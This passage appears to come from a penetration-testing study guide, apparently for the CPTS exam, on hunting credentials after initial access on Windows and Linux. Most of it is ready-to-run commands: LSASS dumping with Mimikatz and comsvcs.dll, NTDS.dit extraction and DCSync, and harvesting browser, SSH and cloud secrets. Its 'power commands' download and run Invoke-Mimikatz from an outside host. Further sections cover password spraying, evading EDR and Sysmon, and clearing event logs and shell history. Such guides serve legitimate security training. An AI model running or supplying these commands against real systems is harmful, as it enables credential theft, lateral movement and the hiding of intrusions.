- What remote access tools exist?
- Are there development tools with stored credentials?
- What scheduled tasks/cron jobs are running?
- Are there any backup scripts or files?
- What cloud services are configured?
Systematic Hunting Workflow¶
Phase 1: Quick Wins (0-5 minutes)¶
Immediate High-Value Targets
Windows Quick Wins:
# 1. Check running processes for passwords
tasklist /v | findstr /i "password"
wmic process list full | findstr /i password
# 2. Check environment variables
set | findstr /i "password key token"
# 3. Recent documents
dir C:\Users\%USERNAME%\Recent
# 4. Browser saved passwords (if accessible)
cmdkey /list
# 5. Unattended install files
dir /s /b C:\*unattend*.xml C:\*sysprep*.xml
# 6. PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Linux Quick Wins:
# 1. History files
cat ~/.bash_history | grep -i pass
# 2. Environment variables
env | grep -i "pass\|key\|token"
# 3. Sudo cached credentials
sudo -l
# 4. Currently typed passwords in memory
ps aux | grep -i password
# 5. Recently modified files
find /home -type f -mtime -1 2>/dev/null | grep -E "\.(txt|doc|xls|conf)$"
Phase 2: User Context (5-15 minutes)¶
User-Specific Credential Sources
Windows User Hunting:
# Run Seatbelt for current user
.\Seatbelt.exe -group=user
# Or manually:
# 1. Browser credentials
.\SharpChrome.exe logins
# 2. Email clients
dir "%APPDATA%\Thunderbird\Profiles\*.default*\logins.json"
# 3. Cloud storage
dir "%LOCALAPPDATA%\Google\Drive\user_default\sync_config.db"
# 4. Development tools
type %USERPROFILE%\.git-credentials
type %USERPROFILE%\.aws\credentials
# 5. Remote access
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
Linux User Hunting:
# 1. SSH keys and configs
find ~/.ssh -type f -exec cat {} \; 2>/dev/null
# 2. Database clients
[ -f ~/.my.cnf ] && cat ~/.my.cnf
[ -f ~/.pgpass ] && cat ~/.pgpass
# 3. Application configs
find ~ -name "*.conf" -o -name "*.config" -o -name "*.ini" 2>/dev/null | xargs grep -i password 2>/dev/null
# 4. Git credentials
git config --list | grep -i credential
# 5. Docker/Kubernetes
[ -f ~/.docker/config.json ] && cat ~/.docker/config.json
Phase 3: System-Wide Search (15-30 minutes)¶
Comprehensive System Analysis
Windows System Search:
# Use LaZagne for comprehensive search
.\laZagne.exe all -v
# Or Seatbelt full audit
.\Seatbelt.exe -group=all -outputfile=seatbelt_full.txt
# Manual comprehensive search
# 1. All config files
Get-ChildItem -Path C:\ -Include *.config,*.ini,*.xml -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password" | Select-Object -Unique Path
# 2. Registry sweep
reg query HKLM /f password /t REG_SZ /s > hklm_passwords.txt
reg query HKCU /f password /t REG_SZ /s > hkcu_passwords.txt
# 3. Service credentials
wmic service get name,startname,pathname
# 4. Scheduled tasks
schtasks /query /xml | findstr /i password
Linux System Search:
# Use LinPEAS
./linpeas.sh -a 2>&1 | tee linpeas_full.txt
# Or manual search
# 1. All readable files with passwords
find / -type f -readable 2>/dev/null | xargs grep -l "password" 2>/dev/null
# 2. Service configurations
find /etc -name "*.conf" -o -name "*.config" 2>/dev/null | xargs grep -i password 2>/dev/null
# 3. Web roots
find /var/www -type f -name "*.php" -o -name "*.asp" -o -name "*.config" 2>/dev/null | xargs grep -i "password\|pwd" 2>/dev/null
# 4. Backup files
find / -name "*.bak" -o -name "*.backup" -o -name "*.old" 2>/dev/null | head -20
Phase 4: Memory & Active Sessions (30+ minutes)¶
Advanced Credential Extraction
Windows Memory Analysis:
# 1. Dump LSASS (multiple methods)
# Method A: Mimikatz
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
# Method B: ProcDump
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Method C: Comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full
# 2. Process specific dumps
Get-Process | Where {$_.ProcessName -match "chrome|firefox|keepass"} | ForEach {
.\procdump.exe -accepteula -ma $_.Id "$($_.ProcessName)_$($_.Id).dmp"
}
# 3. Extract from dumps offline
.\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit
Linux Memory Analysis:
# 1. GDB method
gdb -p $(pgrep -f "chrome|firefox|keepass") -batch -ex "dump memory app.dump 0x0 0xFFFFFFFF" 2>/dev/null
# 2. Mimipenguin
python3 mimipenguin.py
# 3. Process environment extraction
for pid in $(ps aux | grep -E "apache|nginx|mysql" | awk '{print $2}'); do
[ -r /proc/$pid/environ ] && strings /proc/$pid/environ | grep -i pass
done
# 4. Core dumps
find / -name "core.*" 2>/dev/null | while read core; do
strings "$core" | grep -i password | head -5
done
Scenario-Based Approaches¶
Scenario 1: Web Server Compromise¶
Web Server Credential Hunting Path
# 1. Identify web technology stack
ps aux | grep -E "apache|nginx|php|python|node"
netstat -tlnp | grep -E ":80|:443|:8080"
# 2. Find web roots
find / -name "www" -o -name "html" -o -name "htdocs" 2>/dev/null
# 3. Search for config files
find /var/www -name "*.php" -exec grep -l "mysql_connect\|mysqli\|PDO" {} \;
find /var/www -name ".env" 2>/dev/null
# 4. Check for git repositories
find /var/www -name ".git" -type d 2>/dev/null
# 5. Database credentials
grep -r "DB_PASSWORD" /var/www/ 2>/dev/null
# 6. Check web server logs for passwords
grep -i "password" /var/log/apache2/*.log 2>/dev/null | head -20
Scenario 2: Database Server Compromise¶
Database Server Credential Path
# 1. Identify database services
Get-Service | Where {$_.Name -like "*SQL*" -or $_.Name -like "*postgres*" -or $_.Name -like "*mysql*"}
# 2. Find database files
Get-ChildItem -Path C:\ -Include *.mdf,*.ldf,*.bak,*.sql -Recurse -ErrorAction SilentlyContinue
# 3. Connection strings in registry
reg query HKLM /f "Data Source" /t REG_SZ /s
# 4. Database client tools
dir "C:\Program Files\Microsoft SQL Server\*\Tools\Binn"
# 5. Extract from memory
Get-Process sqlservr | ForEach {.\procdump.exe -accepteula -ma $_.Id sql.dmp}
# 6. Linked servers and credentials
sqlcmd -S localhost -E -Q "SELECT * FROM sys.servers"
Scenario 3: Developer Workstation¶
Developer Machine Credential Mining
# 1. Development tools inventory
Get-ChildItem "C:\Program Files" | Where {$_.Name -match "Visual Studio|JetBrains|Git|Docker|Python|Node"}
# 2. Source code repositories
Get-ChildItem -Path C:\Users -Directory -Filter ".git" -Recurse -ErrorAction SilentlyContinue
# 3. Package managers
type C:\Users\*\.npmrc
type C:\Users\*\.pip\pip.conf
type C:\Users\*\.m2\settings.xml
# 4. Container configs
Get-ChildItem -Path C:\ -Include docker-compose.yml,Dockerfile,.env -Recurse -ErrorAction SilentlyContinue
# 5. Cloud CLIs
type C:\Users\*\.aws\credentials
type C:\Users\*\.azure\*
type C:\Users\*\.config\gcloud\*
# 6. SSH keys and configs
Get-ChildItem C:\Users\*\.ssh -Recurse
Scenario 4: Domain Controller¶
Domain Controller Credential Extraction
# 1. Extract NTDS.dit (requires DA)
ntdsutil "activate instance ntds" "ifm" "create full C:\temp\ntds" quit quit
# 2. Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
# 3. DCSync (with appropriate rights)
.\mimikatz.exe "lsadump::dcsync /domain:corp.local /all /csv" exit
# 4. SYSVOL passwords
findstr /s /i /m "password" \\dc01\sysvol\*
# 5. GPP passwords (legacy)
Get-ChildItem -Path "\\dc01\SYSVOL" -Recurse -Include "*.xml" | Select-String -Pattern "cpassword"
# 6. Backup locations
dir C:\Windows\NTDS\*.dit.bak
Credential Hunting Checklist¶
Comprehensive Checklist Matrix
| Category | Windows | Linux | Priority | Tool |
|---|---|---|---|---|
| Memory Passwords | LSASS dump | /proc/*/environ | CRITICAL | Mimikatz/Mimipenguin |
| Browser Passwords | Chrome/Edge/Firefox profiles | ~/.mozilla, ~/.config/google-chrome | HIGH | SharpChrome/LaZagne |
| Config Files | web.config, .ini, .xml | .conf, .cfg, .env | HIGH | Manual/Seatbelt |
| Database Creds | Connection strings, SSMS | .my.cnf, .pgpass | HIGH | Manual search |
| SSH Keys | PuTTY, OpenSSH | ~/.ssh/* | HIGH | SessionGopher/Manual |
| Cloud Credentials | AWS/Azure CLI configs | ~/.aws, ~/.azure | HIGH | Seatbelt/Manual |
| Service Accounts | Registry, services.msc | /etc/systemd/system | MEDIUM | PowerUp/LinPEAS |
| Scheduled Tasks | Task Scheduler, XML files | Crontab, /etc/cron* | MEDIUM | Seatbelt/LinPEAS |
| Command History | PSReadLine, cmd history | .bash_history, .*_history | MEDIUM | Manual |
| Auto-logon | Registry Winlogon | /etc/gdm*/custom.conf | MEDIUM | Manual/LaZagne |
| VPN Configs | OpenVPN, Cisco AnyConnect | /etc/openvpn | MEDIUM | Manual |
| Password Managers | KeePass, LastPass, 1Password | KeePassX, pass | LOW | KeeThief/Manual |
| Email Clients | Outlook PST/OST | Thunderbird, Evolution | LOW | Manual/LaZagne |
| Backup Files | .bak, .old | .backup, ~ | LOW | Manual search |
| Log Files | Event logs, app logs | /var/log/* | LOW | Manual grep |
Quick Reference Commands¶
Copy-Paste Ready One-Liners
Windows Power Commands:
# All passwords in 30 seconds
cmd /c "cmdkey /list & findstr /si password *.txt *.xml *.config & reg query HKLM /f password /t REG_SZ /s & type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
# Quick memory cred dump
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Fast browser creds
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Get-ChromeCreds.ps1'); Get-ChromeCreds"
Linux Power Commands:
# All passwords in 30 seconds
find / -type f -readable 2>/dev/null | xargs grep -i "password\|passwd\|pwd" 2>/dev/null | head -50
# Quick sensitive files
find / \( -name "*.conf" -o -name "*.config" -o -name "*.ini" -o -name ".env" \) -readable 2>/dev/null | xargs grep -l password 2>/dev/null
# Fast memory passwords
ps aux | grep -v grep | awk '{print $2}' | while read p; do strings /proc/$p/environ 2>/dev/null | grep -i pass; done
CPTS Credential Hunting Decision Tree¶
Strategic Decision Making
graph TD
A[Initial Access] --> B{Admin/Root?}
B -->|Yes| C[Memory Dump First]
B -->|No| D[User Context Search]
C --> E[LSASS/Process Memory]
E --> F[Got Domain Creds?]
F -->|Yes| G[Plan Lateral Movement]
F -->|No| H[System-Wide Search]
D --> I[Browser/Config Files]
I --> J[Found Creds?]
J -->|Yes| K[Test Credential Reuse]
J -->|No| L[Expand Search Scope]
K --> M{Works Elsewhere?}
M -->|Yes| N[Lateral Movement]
M -->|No| O[Continue Hunting]
L --> P[Service Configs]
P --> Q[Database Creds]
Q --> R[Scheduled Tasks]
G --> S[Target High-Value Systems]
N --> S
S --> T{Domain Admin Path?}
T -->|Yes| U[Execute Attack Chain]
T -->|No| V[Find Pivot Point]Credential Prioritization Matrix¶
Which Credentials to Pursue First
| Credential Type | Value | Effort | Priority | Why |
|---|---|---|---|---|
| Domain Admin | 10/10 | Varies | CRITICAL | Game over |
| Local Admin (multiple systems) | 9/10 | Low | CRITICAL | Lateral movement |
| Service Account (high priv) | 8/10 | Medium | HIGH | Often over-privileged |
| Database SA/root | 8/10 | Low | HIGH | Data access + possible RCE |
| User with special access | 7/10 | Low | HIGH | Business logic bypass |
| Cloud credentials | 9/10 | Low | HIGH | Scope expansion |
| VPN/Remote access | 7/10 | Medium | MEDIUM | Network pivot |
| Regular domain user | 5/10 | Low | MEDIUM | AD enumeration |
| Local service account | 4/10 | Low | LOW | Limited use |
| Application-specific | 3/10 | High | LOW | Unless critical app |
Post-Exploitation Credential Management¶
Organizing Found Credentials
Credential Database Structure:
Username | Password/Hash | Type | Source | System | Verified | Notes
---------|---------------|------|---------|---------|----------|-------
admin | Summer2024! | Clear | web.config | WEB01 | Yes | IIS App Pool
sa | 5f4dcc3b5aa765d61d8327deb882cf99 | NTLM | Memory | SQL01 | Yes | SQL Server
john.doe | [SSH_KEY] | Key | .ssh/id_rsa | DEV01 | No | Encrypted key
svc_backup | Pass123 | Clear | Task Scheduler | DC01 | Yes | Backup script
Password Patterns to Note:
- Season+Year (Summer2024, Winter23)
- Company+Number (Contoso123)
- Keyboard walks (qwerty, 1qaz2wsx)
- Default passwords unchanged
- Incremental passwords (Pass1, Pass2)
Credential Testing Methodology¶
Safe Credential Validation
Windows Testing:
# Test local authentication
net use \\localhost\c$ /user:administrator Password123
# Test domain authentication
net use \\dc01\c$ /user:domain\username Password123
# PowerShell credential object
$cred = Get-Credential
Test-ComputerSecureChannel -Credential $cred
# WMI test
Get-WmiObject -Class Win32_ComputerSystem -ComputerName target -Credential $cred
# CrackMapExec for mass testing
crackmapexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success
Linux Testing:
# SSH test
ssh user@target "whoami"
sshpass -p 'password' ssh user@target
# Database test
mysql -u root -p'password' -e "SELECT 1"
PGPASSWORD='password' psql -U postgres -c "SELECT 1"
# SMB test
smbclient -L //target -U username%password
# Mass testing with Hydra
hydra -L users.txt -P passwords.txt ssh://target
Defensive Considerations¶
OPSEC During Credential Hunting
Detection Triggers to Avoid:
| Activity | Detection Method | Mitigation |
|---|---|---|
| LSASS access | Sysmon Event 10 | Use indirect methods |
| Registry queries | Audit logs | Query specific keys only |
| File system scanning | EDR behavioral | Limit scope, go slow |
| Browser credential access | Process injection detection | Use built-in tools |
| Memory dumping | WER, Sysmon | Use LOLBins |
| Mass authentication attempts | Account lockout | Test carefully |
| Service enumeration | Network monitoring | Passive collection first |
Cleanup After Credential Hunting¶
Post-Exploitation Hygiene
# Windows cleanup
# Clear PowerShell history
Remove-Item (Get-PSReadlineOption).HistorySavePath
Clear-History
# Remove artifacts
Remove-Item C:\Temp\*.dmp -Force
Remove-Item C:\Temp\*.txt -Force
# Clear event logs (if authorized)
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
# Linux cleanup
# Clear bash history
history -c
cat /dev/null > ~/.bash_history
# Remove artifacts
rm -f /tmp/*.dump
rm -f /tmp/*.txt
# Clear logs (if authorized)
> /var/log/auth.log
> /var/log/syslog
Tool Resources & Updates¶
Essential Tool Repositories
Windows Tools:
- Seatbelt: https://github.com/GhostPack/Seatbelt
- LaZagne: https://github.com/AlessandroZ/LaZagne
- SessionGopher: https://github.com/Arvanaghi/SessionGopher
- SharpDPAPI: https://github.com/GhostPack/SharpDPAPI
- Snaffler: https://github.com/SnaffCon/Snaffler
- WinPEAS: https://github.com/carlospolop/PEASS-ng
Linux Tools:
- LinPEAS: https://github.com/carlospolop/PEASS-ng
- LSE: https://github.com/diego-treitos/linux-smart-enumeration
- LinEnum: https://github.com/rebootuser/LinEnum
- Mimipenguin: https://github.com/huntergregal/mimipenguin
- LaZagne Linux: https://github.com/AlessandroZ/LaZagne
Multi-Platform:
- CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
- Metasploit modules:
post/windows/gather/credentials/* - Empire modules:
collection/chromedump,collection/foxdump
Final Tips & Tricks¶
Pro Tips
- Always check the obvious first - Desktop, Documents, temp folders
- Password reuse is real - Test found passwords everywhere
- Service accounts are goldmines - Often overprivileged
- Don't forget about databases - Connection strings everywhere
- Browser passwords = quick wins - Especially on workstations
- Git repositories contain secrets - .git folders are treasure troves
- Backup files have old passwords - Often still valid
- Memory is the ultimate source - When in doubt, dump it
- Document everything - You'll need it for the report
- Automate but verify - Tools miss things, manual checks matter
Common Mistakes to Avoid
- Don't spray passwords without checking lockout policy
- Don't dump LSASS on production without permission
- Don't modify files unless necessary
- Don't forget to check both x86 and x64 Program Files
- Don't ignore error messages - they often contain paths
- Don't skip "encrypted" passwords - they might be base64
- Don't forget about Unicode/UTF-16 encoded files
- Don't overlook environment variables in scheduled tasks
Reporting Template¶
Credential Finding Documentation
## Credential Discovery - [System Name]
### Finding Summary
- **Credential Type**: [Plaintext/Hash/Key]
- **Account**: [Username/Service]
- **Source**: [File path/Registry/Memory]
- **Privileges**: [Local Admin/Domain User/Service]
### Discovery Method
1. Initial enumeration revealed...
2. Further investigation showed...
3. Credential extracted using...
### Evidence
[Screenshot or command output]
### Impact
This credential provides access to...
### Recommendations
- Implement [specific control]
- Review [configuration/policy]
- Consider [security measure]